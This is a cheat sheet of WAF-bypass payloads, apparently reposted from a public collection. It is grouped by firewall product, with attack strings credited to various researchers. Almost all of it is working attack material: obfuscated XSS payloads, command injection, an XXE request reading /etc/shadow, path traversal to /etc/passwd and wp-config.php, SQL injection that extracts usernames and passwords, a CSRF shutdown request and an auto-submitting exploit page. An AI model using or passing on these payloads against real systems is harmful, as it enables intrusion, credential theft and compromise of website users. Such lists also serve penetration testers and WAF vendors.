- User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
- Accept-Language: en-us,en;q=0.5
- Accept-Encoding: gzip,deflate
- Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
- Keep-Alive: 300
- Connection: keep-alive
- Authorization: Basic YWRtaW46
- Cache-Control: max-age=0
- Content-Type: application/x-www-form-urlencoded
- Content-Length: 95
- sitename=dotdefeater&deletesitename=dotdefeater;id;ls -al ../;pwd;&action=deletesite&linenum=15
复制代码
Persistent XSS (v4.0) by @EnableSecurity
- GET /c?a=<script> HTTP/1.1
- Host: 172.16.159.132
- User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US;
- rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
- Accept-Language: en-us,en;q=0.5
- Accept-Encoding: gzip,deflate
- Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
- <script>alert(1)</script>: aa
- Keep-Alive: 300
复制代码
R-XSS Bypass by @WAFNinja
- <svg/onload=prompt(1);>
- <isindex action="javas&tab;cript:alert(1)" type=image>
- <marquee/onstart=confirm(2)>
复制代码 XSS Bypass by @0xInfection
- <p draggable=True ondragstart=prompt()>alert
- <bleh/ondragstart= parent ['open'] ()%20draggable=True>dragme
- GET - XSS Bypass (v4.02) by @DavidK
- /search?q=%3Cimg%20src=%22WTF%22%20onError=alert(/0wn3d/.source)%20/%3E
- <img src="WTF" onError="{var
- {3:s,2:h,5:a,0:v,4:n,1:e}='earltv'}[self][0][v%2Ba%2Be%2Bs](e%2Bs%2Bv%2B
- h%2Bn)(/0wn3d/.source)" />
复制代码 POST - XSS Bypass (v4.02) by @DavidK
- <img src="WTF" onError="{var
- {3:s,2:h,5:a,0:v,4:n,1:e}='earltv'}[self][0][v+a+e+s](e+s+v+h+n)(/0wn3d/
- .source)" />
复制代码 clave XSS (v4.02) by @DavidK
- /?&idPais=3&clave=%3Cimg%20src=%22WTF%22%20onError=%22{
复制代码
Fortinet Fortiwebpcre_expression unvaidated XSS by @Benjamin Mejri
- /waf/pcre_expression/validate?redir=/success&mkey=0%22%3E%3Ciframe%20src=http://vuln-lab.com%20onload=alert%28%22VL%22%29%20%3C
- /waf/pcre_expression/validate?redir=/success%20%22%3E%3Ciframe%20src=http://vuln-lab.com%20onload=alert%28%22VL%22%29%20%3C&mkey=0
复制代码
CSP Bypass by @Binar10 POST Type Query - POST /<path>/login-app.aspx HTTP/1.1
- Host: <host>
- User-Agent: <any valid user agent string>
- Accept-Encoding: gzip, deflate
- Connection: keep-alive
- Content-Type: application/x-www-form-urlencoded
- Content-Length: <the content length must be at least 2399 bytes>
- var1=datavar1&var2=datavar12&pad=<random data to complete at least 2399 bytes>
复制代码 GET Type Query
- http://<domain>/path?var1=vardata1&var2=vardata2&pad=<large arbitrary data>
复制代码
F5 ASMXSS Bypass by @WAFNinja
- <table background="javascript:alert(1)"></table>
- "/><marquee onfinish=confirm(123)>a</marquee>
复制代码 F5 BIG-IPXSS Bypass by @WAFNinja - <body style="height:1000px" onwheel="[DATA]">
- <div contextmenu="xss">Right-Click Here<menu id="xss" onshow="[DATA]">
- <body style="height:1000px" onwheel="prom%25%32%33%25%32%36x70;t(1)">
- <div contextmenu="xss">Right-Click Here<menu id="xss" onshow="prom%25%32%33%25%32%36x70;t(1)">
复制代码 XSS Bypass by @Aatif Khan
- <body style="height:1000px" onwheel="prom%25%32%33%25%32%36x70;t(1)">
- <div contextmenu="xss">Right-Click Here<menu id="xss"onshow="prom%25%32%33%25%32%36x70;t(1)“>
复制代码 report_type XSS by @NNPoster
- https://host/dms/policy/rep_request.php?report_type=%22%3E%3Cbody+onload=alert(%26quot%3BXSS%26quot%3B)%3E%3Cfoo+
复制代码
POST Based XXE by @Anonymous - POST /sam/admin/vpe2/public/php/server.php HTTP/1.1
- Host: bigip
- Cookie: BIGIPAuthCookie=*VALID_COOKIE*
- Content-Length: 143
- <?xml version="1.0" encoding='utf-8' ?>
- <!DOCTYPE a [<!ENTITY e SYSTEM '/etc/shadow'> ]>
- <message><dialogueType>&e;</dialogueType></message>
复制代码
Directory Traversal by @Anastasios Monachos Read Arbitrary File - /tmui/Control/jspmap/tmui/system/archive/properties.jsp?&name=../../../../../etc/passwd
复制代码 Delete Arbitrary File
- POST /tmui/Control/form HTTP/1.1
- Host: site.com
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
- Accept-Language: en-US,en;q=0.5
- Accept-Encoding: gzip, deflate
- Cookie: JSESSIONID=6C6BADBEFB32C36CDE7A59C416659494; f5advanceddisplay=""; BIGIPAuthCookie=89C1E3BDA86BDF9E0D64AB60417979CA1D9BE1D4; BIGIPAuthUsernameCookie=admin; F5_CURRENT_PARTITION=Common; f5formpage="/tmui/system/archive/properties.jsp?&name=../../../../../etc/passwd"; f5currenttab="main"; f5mainmenuopenlist=""; f5_refreshpage=/tmui/Control/jspmap/tmui/system/archive/properties.jsp%3Fname%3D../../../../../etc/passwd
- Content-Type: application/x-www-form-urlencoded
- _form_holder_opener_=&handler=%2Ftmui%2Fsystem%2Farchive%2Fproperties&handler_before=%2Ftmui%2Fsystem%2Farchive%2Fproperties&showObjList=&showObjList_before=&hideObjList=&hideObjList_before=&enableObjList=&enableObjList_before=&disableObjList=&disableObjList_before=&_bufvalue=icHjvahr354NZKtgQXl5yh2b&_bufvalue_before=icHjvahr354NZKtgQXl5yh2b&_bufvalue_validation=NO_VALIDATION&com.f5.util.LinkedAdd.action_override=%2Ftmui%2Fsystem%2Farchive%2Fproperties&com.f5.util.LinkedAdd.action_override_before=%2Ftmui%2Fsystem%2Farchive%2Fproperties&linked_add_id=&linked_add_id_before=&name=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&name_before=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&form_page=%2Ftmui%2Fsystem%2Farchive%2Fproperties.jsp%3F&form_page_before=%2Ftmui%2Fsystem%2Farchive%2Fproperties.jsp%3F&download_before=Download%3A+..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&restore_before=Restore&delete=Delete&delete_before=Delete
复制代码
F5 FirePassSQLi Bypass from @Anonymous
- state=%2527+and+
- (case+when+SUBSTRING(LOAD_FILE(%2527/etc/passwd%2527),1,1)=char(114)+then+
- BENCHMARK(40000000,ENCODE(%2527hello%2527,%2527batman%2527))+else+0+end)=0+--+
复制代码
ModSecurityRCE Payloads Detection Bypass for PL3 by @theMiddle (v3.1)
RCE Payloads Detection Bypass for PL2 by @theMiddle (v3.1)
- ;+$u+cat+/etc$u/passwd+\#
复制代码RCE Payloads for PL1 and PL2 by @theMiddle (v3.0) RCE Payloads for PL3 by @theMiddle (v3.0) SQLi Bypass by @Johannes Dahse (v2.2)
- 0+div+1+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1%2C2%2Ccurrent_user
复制代码SQLi Bypass by @Yuri Goltsev (v2.2) - 1 AND (select DCount(last(username)&after=1&after=1) from users where username='ad1min')
复制代码SQLi Bypass by @Ahmad Maulana (v2.2) - 1'UNION/*!0SELECT user,2,3,4,5,6,7,8,9/*!0from/*!0mysql.user/*-
复制代码 SQLi Bypass by @Travis Lee (v2.2)
- amUserId=1 union select username,password,3,4 from users
复制代码SQLi Bypass by @Roberto Salgado (v2.2) - %0Aselect%200x00,%200x41%20like/*!31337table_name*/,3%20from%20information_schema.tables%20limit%201
复制代码SQLi Bypass by @Georgi Geshev (v2.2) - 1%0bAND(SELECT%0b1%20FROM%20mysql.x)
复制代码SQLi Bypass by @SQLMap Devs (v2.2) - %40%40new%20union%23sqlmapsqlmap...%0Aselect%201,2,database%23sqlmap%0A%28%29
复制代码SQLi Bypass by @HackPlayers (v2.2) - %0Aselect%200x00%2C%200x41%20not%20like%2F*%2100000table_name*%2F%2C3%20from%20information_schema.tables%20limit%201
复制代码
ImpervaImperva SecureSphere 13 - Remote Command Execution by @rsp3ar
XSS Bypass by @David Y - <svg onload\r\n=$.globalEval("al"+"ert()");>
复制代码
XSS Bypass by @Emad Shanab - <svg/onload=self[`aler`%2b`t`]`1`>
- anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxldz
复制代码
XSS Bypass by @i_bo0om - <iframe/onload='this["src"]="javas cript:al"+"ert``"';>
- <img/src=q onerror='new Function`al\ert\`1\``'>
复制代码
XSS Bypass by @c0d3g33k - <object data='data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=='></object>
复制代码
SQLi Bypass by @DRK1WI - 15 and '1'=(SELECT '1' FROM dual) and '0having'='0having'
复制代码
SQLi by @Giuseppe D’Amore - stringindatasetchoosen%%' and 1 = any (select 1 from SECURE.CONF_SECURE_MEMBERS where FULL_NAME like '%%dministrator' and rownum<=1 and PASSWORD like '0%') and '1%%'='1
复制代码 Imperva SecureSphere <= v13 - Privilege Escalation by @0x09AL
Kona SiteDefenderHTML Injection by @sp1d3rs - %2522%253E%253Csvg%2520height%3D%2522100%2522%2520width%3D%2522100%2522%253E%2520%253Ccircle%2520cx%3D%252250%2522%2520cy%3D%252250%2522%2520r%3D%252240%2522%2520stroke%3D%2522black%2522%2520stroke-width%3D%25223%2522%2520fill%3D%2522red%2522%2520%2F%253E%2520%253C%2Fsvg%253E
复制代码
XSS Bypass by @Jonathan Bouman - <body%20alt=al%20lang=ert%20onmouseenter="top['al'+lang](/PoC%20XSS%20Bypass%20by%20Jonathan%20Bouman/)"
复制代码
XSS Bypass by @zseano - ?"></script><base%20c%3D=href%3Dhttps:\mysite>
复制代码
XSS Bypass by @0xInfection
- <abc/onmouseenter=confirm%60%60>
复制代码
XSS Bypass by @sp1d3rs - %2522%253E%253C%2Fdiv%253E%253C%2Fdiv%253E%253Cbrute%2520onbeforescriptexecute%3D%2527confirm%28document.domain%29%2527%253E
复制代码
XSS Bypass by @Frans Rosén - <style>@keyframes a{}b{animation:a;}</style><b/onanimationstart=prompt`${document.domain}`>
复制代码
XSS Bypass by @Ishaq Mohammed - <marquee+loop=1+width=0+onfinish='new+Function`al\ert\`1\``'>
复制代码
ProfenseGET Type CSRF Attack by @Michael Brooks (>= v.2.6.2) Turn off Proface Machine - <img src=https://host:2000/ajax.html?action=shutdown>
复制代码
Add a proxy - <img src=https://10.1.1.199:2000/ajax.html?vhost_proto=http&vhost=vhost.com&vhost_port=80&rhost_proto=http&rhost=10.1.1.1&rhost_port=80&mode_pass=on&xmle=on&enable_file_upload=on&static_passthrough=on&action=add&do=save>
复制代码
XSS Bypass by @Michael Brooks (>= v.2.6.2) - https://host:2000/proxy.html?action=manage&main=log&show=deny_log&proxy=>"<script>alert(document.cookie)</script>
复制代码
XSS Bypass by @EnableSecurity (>= v2.4) - %3CEvil%20script%20goes%20here%3E=%0AByPass
- %3Cscript%3Ealert(document.cookie)%3C/script%20ByPass%3E
复制代码
QuickDefense
XSS Bypass by @WAFNinja - ?<input type="search" onsearch="aler\u0074(1)">
- <details ontoggle=alert(1)>
复制代码
SucuriSmuggling RCE Payloads by @theMiddle
Obfuscating RCE Payloads by @theMiddle - ;+cat+/e'tc/pass'wd
- c\\a\\t+/et\\c/pas\\swd
复制代码
XSS Bypass by @Luka - "><input/onauxclick="[1].map(prompt)">
复制代码
XSS Bypass by @Brute Logic
- data:text/html,<form action=https://brutelogic.com.br/xss-cp.php method=post>
- <input type=hidden name=a value="<img/src=//knoxss.me/yt.jpg onpointerenter=alert`1`>">
- <input type=submit></form>
复制代码 URLScanDirectory Traversal by @ZeQ3uL (<= v3.1) (Only on ASP.NET)
- http://host.com/test.asp?file=.%./bla.txt
复制代码
WebARXCross Site Scripting by @0xInfection
- <a69/onauxclick=open()>rightclickhere
复制代码
WebKnightCross Site Scripting by @WAFNinja
- <isindex action=j a vas c r ipt:alert(1) type=image>
- <marquee/onstart=confirm(2)>
- <details ontoggle=alert(1)>
- <div contextmenu="xss">Right-Click Here<menu id="xss" onshow="alert(1)">
- <img src=x onwheel=prompt(1)>
复制代码 SQLi by @WAFNinja
- 0 union(select 1,username,password from(users))
- 0 union(select 1,@@hostname,@@datadir)
复制代码 XSS Bypass by @Aatif Khan (v4.1)
- <details ontoggle=alert(1)>
- <div contextmenu="xss">Right-Click Here<menu id="xss" onshow="alert(1)">
复制代码 SQLi Bypass by @ZeQ3uL
- 10 a%nd 1=0/(se%lect top 1 ta%ble_name fr%om info%rmation_schema.tables)
复制代码
WordfenceXSS Bypass by @brute Logic
- <a href=javascript:alert(1)>
复制代码
XSS Bypass by @0xInfection - <a/**/href=j%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At:/**/alert()/**/>click
复制代码
HTML Injection by @Voxel - http://host/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
复制代码
XSS Exploit by @MustLive (>= v3.3.5)
- <html>
- <head>
- <title>Wordfence Security XSS exploit (C) 2012 MustLive.
- http://websecurity.com.ua</title>
- </head>
- <body onLoad="document.hack.submit()">
- <form name="hack" action="http://site/?_wfsf=unlockEmail" method="post">
- <input type="hidden" name="email"
- value="<script>alert(document.cookie)</script>">
- </form>
- </body>
- </html>
复制代码
Other XSS Bypasses - <meter onmouseover="alert(1)"
- '">><div><meter onmouseover="alert(1)"</div>"
- >><marquee loop=1 width=0 onfinish=alert(1)>
复制代码
Apache Generic
Writing method type in lowercase by @i_bo0om - get /login HTTP/1.1
- Host: favoritewaf.com
- User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)
复制代码
IIS Generic
Tabs before method by @i_bo0om - GET /login.php HTTP/1.1
- Host: favoritewaf.com
- User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)
复制代码
|